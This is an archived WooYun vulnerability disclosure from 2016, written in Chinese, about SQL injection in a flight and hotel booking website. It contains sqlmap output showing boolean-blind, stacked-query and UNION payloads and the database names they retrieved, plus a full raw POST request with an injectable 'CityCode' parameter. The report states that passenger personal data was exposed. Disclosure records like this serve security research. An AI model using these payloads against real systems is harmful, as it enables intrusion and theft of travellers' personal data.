乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-19: 细节已通知厂商并且等待厂商处理中 2016-04-22: 厂商已经确认,细节仅向厂商公开 2016-05-02: 细节向核心白帽子及相关领域专家公开 2016-05-12: 细节向普通白帽子公开 2016-05-22: 细节向实习白帽子公开 2016-06-06: 细节向公众公开
RT
注入一:
http://**.**.**.**:80/flight/view_xz.aspx?id=9
注入参数 id
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [ysqlmap identified the following injection point(s) with a total of 54 HTTP(s) request---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9 AND 2970=2970 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=9;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=-4355 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(1---[15:09:21] [INFO] testing Microsoft SQL Server[15:09:21] [INFO] confirming Microsoft SQL Server[15:09:22] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[15:09:22] [INFO] testing if current user is DBAcurrent user is DBA: False[15:09:22] [INFO] fetching database names[15:09:22] [INFO] the SQL query used returns 12 entries[15:09:22] [INFO] retrieved: AgentDB[15:09:22] [INFO] retrieved: cmymall[15:09:23] [INFO] retrieved: cyymall[15:09:23] [INFO] retrieved: EMall[15:09:23] [INFO] retrieved: ggtvisa_pek[15:09:23] [INFO] retrieved: haihua_pek[15:09:23] [INFO] retrieved: master[15:09:23] [INFO] retrieved: model[15:09:23] [INFO] retrieved: msdb[15:09:23] [INFO] retrieved: phmall[15:09:23] [INFO] retrieved: tempdb[15:09:23] [INFO] retrieved: xhmallavailable databases [12]:[*] AgentDB[*] cmymall[*] cyymall[*] EMall[*] ggtvisa_pek[*] haihua_pek[*] master[*] model[*] msdb[*] phmall[*] tempdb[*] xhmall
数据库:
涉及乘客敏感数据 订房信息 航班 姓名 流水号等
数据量较大注入二:
POST /hotel/searchlist.aspx HTTP/1.1Content-Length: 4430Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: ASP.NET_SessionId=o0xqncikkbxpowepywua33q1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*CheckInDate=01/01/1967&CheckOutDate=01/01/1967&CityCode=1&CityName=%e5%8c%97%e4%ba%ac&CityRegion=&hfMaxPrice=0&hfMinPrice=0&hfRank=&hfRoomNum=1&hotelid=&icityregion=San%20Francisco&PorName=&roomid=&txtHotelName=fqwnbsni&__EVENTVALIDATION=/wEdAA37b0eO4dRB4UUqB/4w4/pdZHMbe731eFAxuGvO9ZZ5ZZjeo/fMeTXf/QQiPkaixvAL0yspPcNhOVjUIIFayqSOvSPZXSSPF9R2TFrtv5QdaRUeYxuAVINbp58%2bLmZvWWe4Ltm82CeaLS2kIluHCSoRpwz8DLYyF0vx1oqMiiCqXQpWuJlIup7RXShjdkEB6dhdsH75TQ9b%2bD%2b5XWA7Ji/lhBYXRHobukEUNnQb5b%2bL6lvgu/%2bD2STGYjNLjccYZQgKTJ1RHDZtslr6RMNzYdMlyCH0X0ihRti4ONCc7CULX/hkWojwc%2bXeev%2bqP/umvpM%3d&__VIEWSTATE=/wEPDwUJLTI3NDgyMzIyD2QWAgIDD2QWDAIBD2QWCAIDDw8WAh4EVGV4dAUk5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y%2b4ZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCCw8PZBYCHgdvbmNsaWNrBUxqYXZhc2NyaXB0OmFsZXJ0KCfnrqHnkIblkZjnpoHnlKjms6jlhows6K%2b355S16K%2bd6IGU57O75a6i5pyN5Luj5Li65rOo5YaMJyk7ZAINDxYCHwAF0AI8bGk%2bPGEgaHJlZj0iL0ZsaWdodC8iPuWbveWGheacuuelqDwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvRmxpZ2h0X2ludC9nanRpY2tldHMuYXNweCI%2b5Zu96ZmF5py656WoPC9hPjxpIGNsYXNzPSJpY28wMyI%2bPC9pPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPuWbveWGhemFkuW6lzwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvdmlzYS8iPuWbvemZheetvuivgTwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvdHJhaW4vIj7ngavovabnpag8L2E%2bPGkgY2xhc3M9ImljbzA2Ij48L2k%2bPC9saT5kAh8PFgIfAAWTBSA8QSBjbGFzcz1jaGVjayAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJycpOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2b5YWo6YOoPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgICAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzVBJyk7IGhyZWY9amF2YXNjcmlwdDo7PuS6lOaYn%2be6pzwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnNEEnKTsgaHJlZj1qYXZhc2NyaXB0Ojs%2b5Zub5pif57qnPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhbmsnLCczQScpOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2b5LiJ5pif57qnPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzJBJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuozmmJ/nuqc8L0E%2bIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzFBJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuIDmmJ/nuqc8L0E%2bZAIhDxYCHwAFuAQgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzVTJyk7IGhyZWY9amF2YXNjcmlwdDo7PuS6lOWHhuaYn%2be6py/osarljY48L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSAgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhbmsnLCc0UycpOyBocmVmPWphdmFzY3JpcHQ6Oz7lm5vlh4bmmJ/nuqcv6auY5qGjPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnM1MnKTsgIGhyZWY9amF2YXNjcmlwdDo7PuS4ieWHhuaYn%2be6pzwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnMlMnKTsgIGhyZWY9amF2YXNjcmlwdDo7PuS6jOWHhuaYn%2be6pzwvQT4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzFTJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuIDlh4bmmJ/nuqc8L0E%2bZAIjDxYCHwAF7wUgIDxBIGNsYXNzPWNoZWNrIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDAsMCk7ICBocmVmPWphdmFzY3JpcHQ6Oz7lhajpg6g8L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDEsMTUwKTsgaHJlZj1qYXZhc2NyaXB0Ojs%2bwqUxNTDku6XkuIs8L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYXRlJywxNTEsMzAwKTsgIGhyZWY9amF2YXNjcmlwdDo7PsKlMTUxLTMwMDwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDMwMSw0NTApOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2bwqUzMDEtNDUwPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYXRlJyw0NTEsNjAwKTsgIGhyZWY9amF2YXNjcmlwdDo7PsKlNDUxLTYwMDwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmF0ZScsNjAxLDApOyBocmVmPWphdmFzY3JpcHQ6Oz7CpTYwMOS7peS4ijwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZAInDxYCHwBlZAIpD2QWBgIBDw8WAh8ABTVDb3B5cmlnaHQgwqkgMjAxNCB3d3cuaC1oLmNvbS5jbiBhbGwgcmlnaHRzIHJlc2VydmVkLmRkAgMPDxYCHwAFNOWcsOWdgO%2b8muWMl%2bS6rOW4guS4nOWfjuWMuuWuieW%2bt%2bi3r%2beUsjEw5Y%2b3NS0xMDXlrqRkZAIFDw8WAh8ABRXnlLXor53vvJowMTAtNTE2NjIzNTVkZGQ/m30xxrIB2oaIjvZTY1s/inArXN8n7pub1MP3XwZgLg%3d%3d&__VIEWSTATEGENERATOR=41450651
注入参数 CityCode注入结果:
太慢 不跑了 数据量还是蛮大的
你懂的
危害等级:中
漏洞Rank:10
确认时间:2016-04-22 15:28
CNVD未复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无